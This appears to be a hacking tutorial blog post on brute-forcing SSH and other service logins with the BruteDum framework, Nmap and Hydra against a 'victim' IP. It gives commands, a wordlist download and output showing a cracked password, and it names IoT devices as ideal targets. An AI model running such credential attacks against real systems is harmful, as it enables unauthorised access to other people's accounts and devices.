Brute-forcing is an easy way of discovering weak login credentials and is often one of the first steps when a hacker finds network services running on a network they gain access to. For beginners and experienced hackers alike, it's useful to have access to the right tools to discover, classify, and then launch customized brute-force attacks against a target. BruteDum does it all from a single framework.
When a hacker gains access to a system with services running on it, one of the first things they'll typically do is see if they can log in to any of those services using default or common credentials. Internet of Things (IoT) hardware and devices like routers are often left with default passwords enabled, making them easy to attack.
To test the services they discover for weak passwords, the hacker needs to select the right tool for the job, and it can be confusing to know which tool is the best to use against a particular service.
BruteDum is a Python tool that allows a hacker to acquire a target first and run a scan inside the framework to determine the best tool based on what is discovered. It's easy to run a brute-force or dictionary attack against nearly any standard protocol that's vulnerable to it.
The advantage of running BruteDum over specific tools is the ability to run a scan from within to identify what other processes may be running on the same device, as well as organizing powerful tools for breaking into user accounts on services like SSH.
Unlike attacks launched against WPA networks where we can grab a hash and attempt cracking later, we need to be connected to our target directly over the network to try a brute-forcing or dictionary attack. While there are ways of hiding our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness through a variety of different means.
One way of limiting brute-force and dictionary attacks is through rate-limiting, in which a lockout is triggered after a set amount of incorrect login attempts. That, combined with flagging suspicious login attempts, can make brute-force and dictionary assaults more likely to alert a target that they are under attack.
To execute an online dictionary attack, we'll be using THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. We'll also need a password list, which will be critical to the success or failure of our dictionary attack. If the password list is too large, it will take too long to attack the network, and if it isn't reasonably long enough to contain the password, we run the risk of it not being in the list, causing the attack to fail.
To follow this guide, you'll need Python3 installed on your system. Also, I recommend using Kali Linux, as it should have most of the required programs installed by default. If you're doing this on another system, you'll need to make sure that you have all the prerequisite programs installed.
We'll also need a password list to test, and in this case, we'll be downloading it to a folder we create later. If you have a favorite password list, you'll need to copy it to the folder we'll be making.
To get started, we'll need to download the repository from GitHub. In a new terminal window, you can type in the following command to clone the repo.
~$ git clone https://github.com/GitHackTools/BruteDum Cloning into 'BruteDum'... remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.
And this one to navigate into the directory:
~$ cd BruteDum
From inside this folder, you'll be able to run BruteDum. Before we do, we should take care of one small quirk. I found that BruteDum couldn't find password lists saved outside the BruteDum folder, so the solution seems to be adding our password list directly there. To do this, I'll simply take one off GitHub, and I'll download it to the folder I'm in using the wget command.
~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt --2020-01-10 17:19:59-- https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 220.127.116.11, 18.104.22.168, 22.214.171.124, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|126.96.36.199|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1620 (1.6K) [text/plain] Saving to: ‘Top207-probable-v2.txt’ Top207-probable-v2. 100%[===================>] 1.58K --.-KB/s in 0s 2020-01-10 17:19:59 (53.3 MB/s) - ‘Top207-probable-v2.txt’ saved [1620/1620]
Once it's done, we can run BruteDum by typing the following command.
~/BruteDum$ python3 brutedum.py 888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [?] Enter the victim address:
After the loading screen finishes, we'll need to enter the IP address of the victim. Once you've done so, press Enter, and you'll be presented with the option to run an Nmap scan. It's a handy feature that can help you discover other services open on the same device. Type Y and hit Enter to run the Nmap scan.
[?] Enter the victim address: 192.168.43.1 [?] Do you want to scan victim's ports with Nmap? [Y/n]: Y
When the results return, you should be able to identify any ports that come back as "open." Next, you'll need to select a service to crack. The menu for doing so is quite easy to understand, and you can choose one that matches the service that our Nmap scan discovered.
[+] Scanning ports with Nmap... Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT Nmap scan report for 192.168.43.1 Host is up (0.0087s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: ███.███.███.███.███.███ Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds  FTP  Telnet (Default port is 21) (Default port is 23)  PostgreSQL  SSH (Default port is 5432) (Default port is 22)  RDP  VNC (Default port is 3389) (Default port is 5900) [?] Which protocol do you want to crack? [1-6]: 4
In our example, we'll select option 4 and hit Enter to indicate we want to do SSH cracking.
Now, we'll need to determine the tool we'll be using to try cracking the password. Depending on what service we selected, BruteDum will recommend one to use.
888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [i] Target: 192.168.43.1 Protocol: ssh  Ncrack  Hydra (Recommended)  Medusa [?] Which tool do you want to use? [1-3]: 2
We'll select Hydra, as it's the one recommended for cracking SSH. Type 2 to indicate Hydra (or the number of the tool you wish to use) and press Enter to begin configuring it.
To launch our attack, we'll need to make a time versus probability tradeoff. Our first option will be to select a username list. That means we'll be trying every password in our password list with every username in our username list. It can become a lot of attempts very quickly.
In our example, we can select N to decline using a username list. Instead, we'll use a common username, or one we might know exists by default on the type of device.
[i] Target: 192.168.43.1 Protocol: ssh [?] Do you want to use username list? [Y/n]: N
Because we declined to supply a username list, we'll have to enter one manually instead. Here, I'll enter toor, as I know that's the username for our test device.
[?] Enter the username: toor
Next, we'll need to set the password list. It won't work if we select a password list outside of the directory we're in, so we can now add the password list we downloaded earlier. If you followed along before, we should be able to just paste in the Top207-probable-v2.txt wordlist here.
[?] Enter the path of wordlist: Top207-probable-v2.txt
Finally, we can decide if we want to use the default port or not. Some devices may host services on a port other than the standard one, but this isn't very common. For SSH, the default port is 22, so we'll just enter Y and hit Enter.
[?] Do you want to use default port? [Y/n]: Y
If you're attacking a service on a non-standard port, you can specify it here and press Enter. Do not accidentally type in the number of the port you want to attack here, as the script will crash.
As soon as you supply the port, BruteDum will launch the tool you specified.
[i] Target: 192.168.43.1 Protocol: ssh [+] Hydra is cracking... Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task [DATA] attacking ssh://192.168.43.1:22/
After some time to attack the network and try all of the passwords, you'll get a result, either revealing the password or reporting that a valid password was not found.
[ssh] host: 192.168.43.1 login: toor password: root 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18 [?] Do you want to conitnue? [Y/n]: N
A key thing to remember about brute-force and dictionary attacks is that they are powerful in the right place, but not a silver bullet for breaking into accounts. Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. That issue necessitates prolonged contact with the victim to burn through those longer lists, making the attack less practical and more evident to anyone watching for this kind of attack.
An ideal target for these attacks is primarily IoT devices, which generally have poor security and a plethora of services running with default credentials.
I hope you enjoyed this guide to brute-forcing weak login credentials with BruteDum! If you have any questions about this tutorial on brute-forcing frameworks or you have a comment, there's the comments section below, and feel free to reach me on Twitter @KodyKinzie.